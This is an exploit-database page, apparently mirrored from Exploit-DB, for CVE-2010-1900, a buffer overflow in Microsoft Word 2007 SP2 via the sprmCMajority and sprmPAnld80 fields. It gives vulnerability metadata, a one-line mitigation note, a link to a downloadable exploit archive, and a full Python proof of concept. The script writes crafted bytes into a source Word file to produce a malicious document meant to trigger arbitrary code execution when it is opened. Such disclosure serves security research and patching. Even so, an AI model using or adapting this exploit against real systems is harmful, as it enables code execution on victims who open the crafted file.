header-logo
Suggest Exploit
vendor:
Word
by:
Shahin, Abysssec
9,3
CVSS
CRITICAL
Buffer Overflow
119
CWE
Product Name: Word
Affected Version From: Word 2007 SP2
Affected Version To: Word 2007 SP2
Patch Exists: Yes
Related CWE: CVE-2010-1900
CPE: a:microsoft:word:2007
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

Microsoft Office Word sprmCMajority buffer overflow

This exploit is a buffer overflow vulnerability in Microsoft Office Word 2007 SP2. It is triggered when a specially crafted Word document is opened. The vulnerability is caused by a lack of proper bounds checking of the sprmCMajority and sprmPAnld80 fields in the Word document. This can allow an attacker to execute arbitrary code on the target system.

Mitigation:

Microsoft has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14971.zip (moaub-11-exploit.zip)
'''

'''
  Title               :  Microsoft Office Word sprmCMajority buffer overflow
  Version             :  Word 2007 SP 2
  Analysis           :  http://www.abysssec.com
  Vendor              :  http://www.microsoft.com
  Impact              :  Critical
  Contact             :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             :  @abysssec
  CVE                 :  CVE-2010-1900

'''

import sys

def main():
   
    try:
		fdR = open('src.doc', 'rb+')
		strTotal = fdR.read()
		str1 = strTotal[:4082]
		str2 = strTotal[4088:]
		
		sprmCMajority = "\x47\xCA\xFF"    # sprmCMajority  
		sprmPAnld80 = "\x3E\xC6\xFF"    # sprmPAnld80
				
		fdW= open('poc.doc', 'wb+')
		fdW.write(str1)
		fdW.write(sprmCMajority)
		fdW.write(sprmPAnld80)				
		fdW.write(str2)
		
		fdW.close()
		fdR.close()
		print '[-] Word file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                
if __name__ == '__main__':
    main()

Navigation

Suggest Exploit

Services By CQR